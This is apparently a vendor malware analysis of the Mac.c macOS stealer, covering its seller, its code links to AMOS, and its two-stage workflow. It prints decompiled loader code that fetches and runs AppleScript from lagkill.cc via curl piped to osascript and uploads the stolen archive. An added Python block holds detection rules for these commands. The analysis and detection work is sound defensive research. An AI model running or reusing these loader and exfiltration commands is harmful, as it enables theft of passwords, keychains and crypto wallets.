The history of the Mac.c stealer is short and does not yet rest on a large set of samples. It first surfaced on darknet forums, where a threat actor going by 'mentalpositive' began drawing attention with a set of characteristics that are unusual among stealer developers. Moonlock Lab, MacPaw's cybersecurity division, has been tracking mentalpositive for months. We have observed that the macOS malware market, although still far less mature than its Windows counterpart, is attracting a new wave of threat actors who are both technically skilled and commercially minded.

Despite having existed for only a matter of months, Mac.c already shares key traits with established stealer operations. Borrowing heavily from AMOS and reusing the URL patterns of its command-and-control infrastructure, Mac.c appears to be part of a growing underground ecosystem built around macOS users.

Also notable is the methodical and transparent approach to building in public. 'mentalpositive' solicits feedback from forum visitors and customers on Mac.c builds, an unusual level of openness in the world of macOS malware development. In this article we examine the evolution of Mac.c, mentalpositive's tactics, and how this stealer fits into the broader landscape of threats targeting Apple platforms.

A new player in the market

Several months ago, Moonlock Lab wrote about the Mac.c stealer and its author, who operates under the alias 'mentalpositive'. This threat actor is one of a handful of new entrants in the macOS malware market, a niche that is far less crowded than Windows-targeting malware.
Compared with other threat actors, 'mentalpositive' has adopted newer approaches to malware development: a modular architecture with separated components, layered obfuscation techniques, and more resilient command-and-control (C2) infrastructure. What really sets mentalpositive's Mac.c apart, however, is its targeting profile and its approach to data exfiltration. iCloud Keychain credentials, browser passwords, crypto wallets, system metadata, and even arbitrary files from common macOS directories are all collected using credentials obtained through phishing. By relying on standard system APIs and native communication methods, it slips past common endpoint defenses.

Building in public

Beyond technical skill, 'mentalpositive' shows an unusual degree of openness on darknet forums. Over the past several months, this threat actor has used an underground forum to announce Mac.c updates, engage with interested users, and respond to feedback. This cadence shows both an ability to iterate and a deliberate effort to reach the relevant market. Together, these traits point to a custom stealer-as-a-service business model dedicated entirely to the macOS threat niche.

The following screenshots show that forum posts appear about as regularly as new updates. Since the posts are typically written in Russian, we provide a brief summary of each. The first screenshot shows the initial advertisement, which offers a subscription to stealer updates for 1,500 USD per month. After that, 'mentalpositive' shared a detailed description of Mac.c's features.
Among these, the most notable updates include a module targeting the Ledger Live app, a reduced binary file size (for a faster download and potentially fewer artifacts detectable through static analysis), and an optimized admin panel. In this context the panel is the web-based interface for mentalpositive's clients, the customers of the Mac.c stealer. It lets them generate malware builds, track infections (including both successful and failed attempts), and manage other campaign details.

As noted earlier, 'mentalpositive' actively shares updates about the tool in order to convince prospective customers that development is ongoing. Below is an example of one such update, in which the threat actor announces the testing of a new version for macOS versions below 10.12.6. The post also lists contact methods, with links to Tox and Jabber.

Finally, the most recent post at the time of writing announces further updates. These include evading XProtect by removing specific strings from the build, an expanded list of supported browsers, configuration of the file grabber through the control panel, and, most notably, a separate phishing module for Trezor seed phrases. As with the Ledger Live module, this new feature is sold for an additional $1,000.

Connection with AMOS

Notably, several researchers have pointed out striking similarities in the Mac.c code, suggesting it could be a modified version of Atomic macOS Stealer. Moonlock Lab analyzed recent payloads of both stealers and found that Mac.c overlaps heavily with AMOS. While the two sets of functions are largely the same, 'mentalpositive' has still done considerable work on top of them. This suggests either direct code sharing or adaptation of the original code base.
Comparison (from one of our recent articles):

Highlighted in red: AMOS, SHA256 54b9576aad25d54d703adb9a26feaa5d80f44b94731ff8ecff7cf1ebc15cf3ff, first seen 2025-06-19 20:18:55
Highlighted in green: mentalpositive (Mac.c), SHA256 7dfd77f09a90d8d01a7d74a84685645622ae87a90b5dd72a5750daac9195c467, first seen 2025-07-01 15:41:49

The side-by-side comparison shows a high degree of function-level code reuse between Mac.c and Atomic macOS Stealer. In some cases, functions appear to have been copied verbatim or with only minor modifications, which suggests shared development or a common code base. Overall, both tools follow the same operational structure for harvesting sensitive data from macOS systems. In both cases this is done with built-in macOS tools and scripting, which reduces external dependencies and improves compatibility. The following table shows the features they share.

Beyond the shared internals, AMOS shows clear advantages in functionality, modularity, and targeting. The following table shows the features unique to each. Where Mac.c operates as a compact, non-persistent AppleScript-based stealer, Atomic macOS Stealer offers a more mature, flexible, and modular design philosophy. The high degree of code reuse raises important questions about attribution, builder access, and unauthorized sharing within the macOS malware ecosystem. Although mentalpositive's tool may be derivative, it is not the more capable of the two: AMOS remains the more mature and feature-rich stealer today.

How the Mac.c stealer works

As noted previously, its operational domain has not changed: https://lagkill[.]cc.
It hosts the PHP files used to process victims and other parts of the operation. The server exposes several Mach-O files, but in general the workflow can be split into two stages: the initial Mach-O executable and the AppleScript payload.

Stage 1: Initial Mach-O executable

The Mac.c stealer uses a multi-stage execution flow in which the first stage acts as a lightweight loader responsible for preparing the environment, evading scrutiny, and delivering the next-stage payload in a controlled way. Below is a detailed breakdown of this stage, based on reverse engineering of sample 90309fc3b901df1d7b6d7b6d747c5afa63fca6262721ce39c34da4b13901d53b919a3.

```c
undefined8 entry(void)
{
  pid_t pVar1;
  int res;
  char cmd [1024];
  char id [56];
  undefined7 url_C2;
  undefined4 uStack_29;
  long local_20;

  local_20 = *(long *)PTR____stack_chk_guard_100001008;
  pVar1 = _fork();
  if (-1 < pVar1) {
    if (pVar1 != 0) {
      /* parent returns immediately; the forked child carries on below */
LAB_100000e59:
      if (*(long *)PTR____stack_chk_guard_100001008 == local_20) {
        return 0;
      }
      ___stack_chk_fail();
    }
    pVar1 = _setsid();
    if (-1 < pVar1) {
      _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018);
      _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020);
      _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010);
      /* SandBox protection */
      _system("killall Terminal");
      /* Create C2: lagkill.cc */
      url_C2 = 0x6c6c696b67616c;
      uStack_29 = 0x63632e;
      builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb);
      builtin_strncpy(id + 0x10,"592960231c11198d",0x10);
      builtin_strncpy(id,"17508488681a0237",0x10);
      /* Run upload and run applescript stealer logic:
         curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */
      /* format arguments (&url_C2, id) were dropped by the decompiler and are restored here */
      _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript",&url_C2,id);
      res = _system(cmd);
      if (res == 0) {
        /* Run upload to lagkill.cc */
        _snprintf(cmd,0x400,
                  "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"buildtxd=%s\" https://%s/",
                  id,&url_C2);
        res = _system(cmd);
        if (res == 0) goto LAB_100000e59;
      }
    }
  }
  _exit(1);
}
```

Mac.c's entry point, entry(), begins by forking the current process and starting a new session with setsid(), effectively daemonizing itself. This detaches the malware from the controlling terminal and lets it keep running in the background. The same routine then redirects standard input, output, and error to /dev/null with freopen(). This suppresses any console output that could otherwise end up in debug logs or terminal monitors.

The malware hardcodes its command-and-control (C2) domain as lagkill[.]cc. It builds a unique victim identifier by concatenating static hexadecimal segments. The result is a pseudo-unique txd token, used either to fingerprint the infected host or to track infection batches during C2 communication.

The key step in this stage is fetching and running the AppleScript in memory. This is done by chaining curl and osascript so that the payload is downloaded and executed directly:

curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript

This approach lets the attacker update the payload at any time without touching the loader, and the direct execution path limits the forensic artifacts left on disk. Once the AppleScript has run (and collected the local data), the loader uploads the resulting ZIP archive to the same C2 server:

curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/

The upload uses a custom header (cl: 0) and a generous timeout to cope with slow connections, which suggests some attention to operational stability.

Stage 2: AppleScript payload

The second stage of the Mac.c stealer is where the real damage begins.
The AppleScript payload relies on native macOS capabilities to gather sensitive data. Notably, it does so without dropping additional binaries or exploiting any privilege escalation; the phished password supplies the access it needs. Below we break down the second-stage payload by category.

Credential theft & CLI abuse

The script displays a fake system prompt that asks for the user's password. The password is stored in plaintext and reused later. The script then uses the security command-line utility to extract stored credentials from the Keychain, typically including those saved by Google Chrome and other Chromium-based apps. The output is written to /tmp/<random>/Password. This is a phishing tactic that uses native tooling and standard macOS prompts to deceive the user. No exploit code or elevated privileges are required.

Browser and extension data theft

Supported browsers include Chrome, Edge, Brave, and Yandex. The collected files include login data, cookies, web data, and IndexedDB storage. The script also iterates through hundreds of known crypto wallet extensions, such as MetaMask, Phantom, and Binance Wallet, and extracts their local storage files or session artifacts. All browser-related data is staged under /tmp/<random>/Browsers/.

Hot wallet and crypto app harvesting

The payload checks for the presence of popular desktop crypto wallets, including Ledger Live, among others. Relevant data, such as wallet files and configuration databases (e.g. LevelDB directories), is collected into /tmp/<random>/Cryptowallets/. Clearly, the stealer is designed with a crypto-enthusiast victim base in mind.
File grabber and its logic

To maximize intelligence value while keeping its footprint small, the script does the following: it recursively searches the user's Desktop, Documents, and Downloads folders; it filters for high-value file types (.wallet, .seed, .txt, .keys, .pdf, .docx); and it enforces a file size limit of roughly 10 MB.

Collection of messaging and app artifacts

Mac.c copies the tdata folder, which may contain active session tokens or cached messages (associated with Telegram). Configuration files from the Binance and Ton Keeper apps are collected and may reveal wallet usage, login details, or stored keys. system_profiler is used to capture hardware, macOS, and display information. This helps profile the victim's environment, not just their assets.

Archiving and exfiltration

All collected data is staged under /tmp/<random>/. Using ditto -c -k, macOS's native archiving tool, the script compresses the entire folder into /tmp/osalogging.zip. After the upload, the payload cleans up after itself. No persistence mechanism or scheduled execution is established. This stealth-focused, ephemeral design points to a fast smash-and-grab operation, most likely intended for one-time use or as one link in an infection chain.

Phishing functionality

One notable technique in mentalpositive's second-stage payload is a fake system prompt disguised as a permission request from a game.
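As an added defender-side example (not from the original article), the following rules flag the process behaviours described for both stages over constructed process-execution events; the parent and cmdline fields, the PLACEHOLDER token and the /tmp/xK3f9 staging path are assumptions made for the sample.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    parent: str    # image name of the parent process, as a process-monitoring sensor would record it
    cmdline: str   # full command line of the new process

# Command-line patterns for the Mac.c behaviours described above (stage 1 loader, stage 2 AppleScript).
RULES = {
    "curl_piped_to_osascript": re.compile(r"\bcurl\b.*\|\s*osascript\b"),                 # remote AppleScript run in memory
    "terminal_killed":         re.compile(r"\bkillall\s+Terminal\b"),                      # loader hides its terminal
    "tmp_staging_archived":    re.compile(r"\bditto\s+-c\s+-k\b.*\s/tmp/\S+\.zip"),        # ditto -c -k ... /tmp/*.zip
    "tmp_zip_uploaded":        re.compile(r"\bcurl\b.*-F\s+\"?file=@/tmp/[^\s\"]+\.zip"),  # POST of the staged archive
}

def keychain_access_from_script(ev: ProcEvent) -> bool:
    """Stage 2 shells out to the `security` CLI from osascript, so the parent image is the signal."""
    return ev.parent == "osascript" and re.match(r"(?:/usr/bin/)?security\b", ev.cmdline) is not None

def evaluate(events):
    """Return {rule_name: [pid, ...]} for every rule that fired on at least one event."""
    hits = {}
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev.cmdline):
                hits.setdefault(name, []).append(ev.pid)
        if keychain_access_from_script(ev):
            hits.setdefault("security_cli_from_osascript", []).append(ev.pid)
    return hits

# Constructed sample events, not real telemetry; PLACEHOLDER stands in for the txd token.
SAMPLE_EVENTS = [
    ProcEvent(401, "loader", "/bin/sh -c curl -s https://lagkill.cc/src.php?txd=PLACEHOLDER | osascript"),
    ProcEvent(402, "loader", "/bin/sh -c killall Terminal"),
    ProcEvent(403, "osascript", "security find-generic-password -s example.com"),
    ProcEvent(404, "osascript", "ditto -c -k /tmp/xK3f9 /tmp/osalogging.zip"),
    ProcEvent(405, "loader", '/bin/sh -c curl -X POST -H "cl: 0" --max-time 300 '
                             '-F "file=@/tmp/osalogging.zip" -F "buildtxd=PLACEHOLDER" https://lagkill.cc/'),
    ProcEvent(501, "zsh", "curl -s https://example.com/health"),                      # benign download
    ProcEvent(502, "zsh", "security list-keychains"),                                  # benign: interactive shell parent
    ProcEvent(503, "Finder", "ditto -c -k /Users/me/report /Users/me/report.zip"),    # benign: archive outside /tmp
]

if __name__ == "__main__":
    for rule, pids in evaluate(SAMPLE_EVENTS).items():
        print(f"{rule}: pids {pids}")
```

Each hit is a single event; correlating the five rules on one host within a short window is what turns them into a high-confidence Mac.c detection.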
Specifically, Mac.c shows an AppleScript dialog asking the user to enter their macOS login password in order to "allow the game to access your account", with Innocent Witches as the purported game. These samples also carry the build tag 'innocent', most likely used to group infections belonging to a single campaign. Notably, the domain used is inocentwitches[.]top. Although the root URL redirects to Google, the server exposes an endpoint at /upload.php that lets the threat actor receive the stolen data.

Conclusions

As Macs become increasingly popular among both mainstream consumers and crypto users in particular, we expect stealers to grow not only in number but in market share and impact. Mac.c is not an isolated example but part of a broader trend in the evolution of macOS malware. While it reuses features, patterns, and structures from Atomic Stealer, it adapts them to the macOS environment and adds its own touches. What we are watching emerge is a new business model: stealer-as-a-service, built specifically for macOS users and mirroring the larger malware-as-a-service economy. Although Atomic Stealer remains the better-known of the two, it may be only a matter of months before new actors build on its foundation to produce even more capable malware.